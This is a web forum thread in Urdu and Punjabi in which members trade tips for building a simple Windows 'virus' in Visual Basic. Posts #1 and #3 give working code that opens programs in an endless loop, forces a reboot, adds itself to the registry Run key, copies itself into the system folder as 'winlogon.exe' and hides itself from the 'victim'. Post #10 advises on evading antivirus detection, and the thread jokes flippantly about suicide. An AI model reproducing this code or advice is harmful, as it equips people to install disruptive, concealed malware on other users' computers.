| کمپیوٹر سیکورٹی کمپیوٹر سیکورٹی |
![]() |
|
|
LinkBack | موضوع کے اختیارات | موضوع کی درجہ بندی | ظاہری انداز |
|
|
#1 |
|
Senior Member
![]() |
اسلام علیکم کی حال وا سجنو تے بیلیو مترو تے سلیو دوجی وار گستاخی کر ریا واں امید وا تسیں نا پسند کرو گے
اب میں آتا ہوں اصل تھریڈ کی طرف جو کمیوٹر وائرس کے متعلق ہے سب سے پہلے میں اپنے نظریات پیش کرنا چاہتا ہوں بعد میں ایکسپرٹز کی راے بھی بیان کروں گا میرے نزدیک وائرس پھیلنے اور بیماری پھلانے کا نام ہے لیکن اگر ایک سمپل پروگرام کو بھی الٹا استعمال کیا جاے تو وائرس بن سکتی ہے یہ سب انسانی ذہن پر منحصر ہے اس کی ایک مثال پیش کیے دیتا ہوں وی بی کا ایک سمپل لوپ فار لوپ اس کی مثال دے رھا ھوں For i = 1 to 10 Next Shell "mspaint" یھ ایک سمل میتھڈ ھے پینٹ کو اوپن کرنے کا اگر اب ان دونوں کوڈوں کو ایک وائرس بنانے والے زہن کے زریعے جوڑا جاے For i = 1 to 10 Shell "mspaint" Next تو یہ ایک وائرس کی سی شکل بن جاے گی جو بہت سمپل ہے یہ پروگرام پینٹ کو 10 بار کھولے گا اگر اس میں وائل لوپ کا استعمال کر دیں تو While (1) Shell "mspaint" Wend لیکن اب یہ پروگرام پینٹ کو اوپن بار بار کرتا رہے گا اگر اس ،یں ہلکا سا اضافہ کریں تو While (1) Shell "mspaint" Shell "cmd" Shell "notepad" Shell "spider" Shell "calc" Wend تو اب یہ بہت سی اشیا کو کھول دے گا اسی طرح کمپیوٹر کو ری سٹارٹ کرنے کے لیے یہ کمانڈ دی جاتی ہے Shell "shutdown -r" اگر یہ کمانڈ اس پروگرام کہ اخر میں ایڈ کر دیں یا اکیلی ہی لکھ دی جاے تو سسٹم ری سٹارٹ کر دے گا اس کو اگر سٹآرٹ اپ میں ایڈ کر دیں اور کاپی کر کے سسٹم تھرٹی ٹو کی ڈاریکٹری میں رکھ دیں یا جہاں اپکا دل کرے تو یہ بھی ایک وائرس کا کام کرے گا لیکن ایک بات یاد رکھیں اسے ٹایمر میں ایڈ کریں تاکہ وکٹم اسے ڈسایبل نا کر سکے رجسٹری میں انٹری کرنے کے لیے یہ سائٹ اپکے لیے مفید ہو گی http://www.arcatapet.net/vbregset.cfm http://www.planet-source-code.com/vb...=1881&lngWId=1 باقی پوسٹنگ ائندہ کروں گا |
|
|
|
| 5 قاری/قارئین نے عقرب کا شکریہ ادا کیا |
|
|
#3 |
|
Senior Member
![]() |
بیلیاں دی زور دار فرمیش تے چاچے صدیق دی سچایئ تو متاثر ہو کے اسی وایریس نوں اگے ٹوردا واں
یعنی اس وایرس میں اضافت جیسے میں نے سابقہ پوسٹ میں عرض کیا تھا اس کو اگر سٹآرٹ اپ میں ایڈ کر دیں اور کاپی کر کے سسٹم تھرٹی ٹو کی ڈاریکٹری میں رکھ دیں یا جہاں اپکا دل کرے تو یہ بھی ایک وائرس کا کام کرے گا لیکن ایک بات یاد رکھیں اسے ٹایمر میں ایڈ کریں تاکہ وکٹم اسے ڈسایبل نا کر سکے تو اسے سٹارٹ اپ میں ایڈ کرنے کا تریقہ حاضر خدمت ھے ![]() ایک نیا مڈیول ایڈ کریں اور اس میں یہ کوڈ ٹرایی کریں 'Paste everything into a module Option Explicit Private Const ERROR_SUCCESS = 0& Private Const REG_OPTION_NON_VOLATILE = 0 ' Key is preserved when system is rebooted Public Enum RegistryKeys HKEY_CURRENT_USER = &H80000001 HKEY_LOCAL_MACHINE = &H80000002 End Enum Private Const SYNCHRONIZE = &H100000 Private Const STANDARD_RIGHTS_ALL = &H1F0000 Private Const KEY_QUERY_VALUE = &H1 Private Const KEY_SET_VALUE = &H2 Private Const KEY_CREATE_SUB_KEY = &H4 Private Const KEY_ENUMERATE_SUB_KEYS = &H8 Private Const KEY_NOTIFY = &H10 Private Const KEY_CREATE_LINK = &H20 Private Const KEY_ALL_ACCESS = ((STANDARD_RIGHTS_ALL Or KEY_QUERY_VALUE Or _ KEY_SET_VALUE Or KEY_CREATE_SUB_KEY Or KEY_ENUMERATE_SUB_KEYS Or _ KEY_NOTIFY Or KEY_CREATE_LINK) And (Not SYNCHRONIZE)) Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hkey As Long, ByVal lpValueName As String) As Long Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hkey As Long, ByVal lpSubKey As String, _ ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hkey As Long, ByVal lpSubKey As String, _ ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, _ phkResult As Long, lpdwDisposition As Long) As Long Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hkey As Long, ByVal lpValueName As String, _ ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hkey As Long) As Long Public Sub SetAutoStart(RegistryKey As RegistryKeys) Dim nRet As Long, hkey As Long, nResult As Long, AppPath As String رجسٹری میں انٹری کرنا EXENAME کو اپنی اگزی کے نام سے ریپلیس کریں نوٹ : اگر گھر میں گڑ موجود ھو تو تھوڑا سا کھا لیں "گڑ نا ہو تو زہر بھی مفید ھے" کیونکہ جو زہر سے مر جاے اسے گڑ دینے کی کیا ضرورت ۔ پہلی لاین میں ونڈوز کے فولڈر کا پاتھ اٹھایا گیا ھے اپ اس پاتھ کو بدل بھی سکتے ھیں۔ اور پھر رجسٹری میں انٹری ھو رہی ھے Dim sSysPath As String: sSysPath = Environ("SystemRoot") AppPath = sSysPath & "\system\.EXENAME.exe" nRet = RegCreateKeyEx(RegistryKey, "Software\Microsoft\Windows\CurrentVersion\Run ", 0&, vbNullString, _ REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, ByVal 0&, hkey, nResult) If nRet = ERROR_SUCCESS Then nRet = RegSetValueEx(hkey, App.EXEName, 0&, 1&, ByVal AppPath, Len(AppPath)) Call RegCloseKey(hkey) End If End Sub اب فارم پر ایک ٹایمر لگاییں اور اس کا انٹرول 100 کر دیں اور اس میں یہ کوڈ لگا دیں On Error Resume Next SetAutoStart HKEY_LOCAL_MACHINE اپ کا پروگرام سٹارٹ اپ میں ایڈ ہو گیا ھے نوٹ: آپ اب سکون سے خودکشی کر سکتے ھیں اپنی فایل کو سسٹم کے فولڈر میں کاپی کس طرح کریں ؟ خیال : دھینہ پی کے جواب : نیچے دیا گیا کوڈ استعمال کر کے Dim sSysPath As String: sSysPath = Environ("SystemRoot") FileCopy (App.Path & "\" & App.EXEName) & ".exe", sSysPath & "\system\winlogon.exe" SetAttr sSysPath & "\system\EXEName.exe", vbSystem + vbHidden پہلی لاین میں ایگزی اپنا پاتھ اٹھاتی ھے اور اسے سسٹم کے فولڈر میں کاپی کر دیتی ھےEXEName کو اپنی گایل کے نام سے ریپلیس کر دیں اور دوسری لاین میں اگزی خود کو سسٹم ہیڈن کر رہی ھے وکٹم نے اگر ہیڈن فایلز کو شو بہی کیا ھو تو وہ اسے نہیں دیکھ سکے گا کیوں نہیں دیکھ سکے گا اگر اس کا جواب چاہیے ھو تو ریپلاے کر دیجیے گا اوکا سمجھو فر میرے ولوں رب راکھا پپی |
|
|
|
| عقرب کا شکریہ ادا کیا گیا | بھائی (22-11-08) |
|
|
#4 |
|
ناظم اعلی
![]() ![]() |
عقرب کیا بھائی لوگ اس کا مس یوز تو نہیں کریں گے؟
|
|
|
|
|
|
#5 |
|
Senior Member
![]() |
میں دسیا ہی اس واسطے وا منڈیا
|
|
|
|
|
|
#7 |
|
ناظم اعلی
![]() ![]() ![]() تاریخ شمولیت: Dec 2007
مقام: کراچی
مراسلات: 15,969
کمائي: 276,801
شکریہ: 33,206
12,658 مراسلہ میں 37,006 بارشکریہ ادا کیا گیا
|
|
|
|
|
|
|
#8 | |
|
Senior Member
![]() |
اقتباس:
ایسی ایسی چیزیں سکھا دوں گا کہ آپ لوگ انشاللہ مجھے اچھے الفاظ میںہی یاد کریں گے۔۔۔ بس موقعہ دیں۔۔۔۔ میںآپ لوگوں کو یہ تو بتاوں گا کہ وائرسز کام کیسے کرتے ہیں اور کیا کیا چیزیںانفیکٹ کرتے ہیں اور اس کو ختم کیسے کرنا ہے لیکن یہ آپ کو خود ہی سوچنا ہو گا کہ اس کو بنانا کیسے ہے۔۔۔۔ ویسے نہ ہی بنایا جائے تو اچھا ہے کیونکہ پچھلے سال سے پاکستان میںبھی سائبر کرایمز لاگو ہو چکے ہیں۔۔۔۔ مگر اس کام میںمزا بہت ہے اور پروگرامنگ بھی سہی اس میںہی ہوتی ہے۔۔۔
|
|
|
|
|
|
|
#10 |
|
Senior Member
![]() |
جناب یہ جو آپ نے طریقہ بتایا ہے اس سے یہ ایک وائرس کی طرح ایکٹ کرے گا اور انٹی وائرس اس کے پیٹرن کو چیک کر کے اس کو وایرس کے طور پر لے لے گا اور پھر اس کو ڈسایبل کر دے گا۔ آپ کو ایک ہنٹ دیتا ہوں اس کے ذریعے آپ کو پراگرام نارمل ہی رہے گا اور وایرس نہیںبنے گا مگر کام کرے گا بڑے بڑے وارسوں والے۔
سب سے پہلا کام تو آپ یہ کریںکہ رجسٹری کو نکال دیں اس کی جگہ ون 32 اے پی آئی استعمال کر کے پروگرام کو سٹارٹ اپ میںرکھوائیں اب دنیا کے سارے انٹی وائرس مر کھپ جائیں گے مگر وہ اس کو ڈیٹیکٹ نہیںکر سکیںگے۔ کیونکہ انٹی وایرس ون 32 اے پی آئی کو بلاک نہیںکر سکتے کیونکہ اس کو ونڈوز خود بہت زیادہ استعمال کرتی ہے۔ سو موجاں مارو |
|
|
|
![]() |
| Tags |
| .net, aruz, com, software, system, فارم, پوسٹ, پاکستان, پسند, ونڈوز, وائرس, لوگ, مکمل, آدمی, اسلام, بھائی, جواب, حال, خودکشی, دل, سال, صدیق |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| موضوع کے اختیارات | |
| ظاہری انداز | Rate This Thread |
|
|
Similar Threads
|
||||
| موضوع | موضوع شروع کیا | فورم | جوابات | آخری مراسلہ |
| بہترین Anti-virus کونسا ہے؟ | مسٹر رائٹ | کمپیوٹر سیکورٹی | 65 | 10-05-10 03:27 AM |
| WHAT IS A VIRUS? | راجہ اکرام | Chit Chat | 0 | 19-02-10 11:38 PM |
| شمارندی حُمہ (computer virus) | طارق راحیل | شعبہ طب | 0 | 27-12-08 05:03 PM |
| Is windows a virus? | ابو عمار | کمپیوٹر کی باتیں | 1 | 21-11-07 11:12 AM |
| Anti Virus for Mobiles | عبدالقدوس | سوفٹ ویرز کے بارے میں آپکی رائے اور سوفٹ ویر کی درخواست | 0 | 05-10-07 03:04 PM |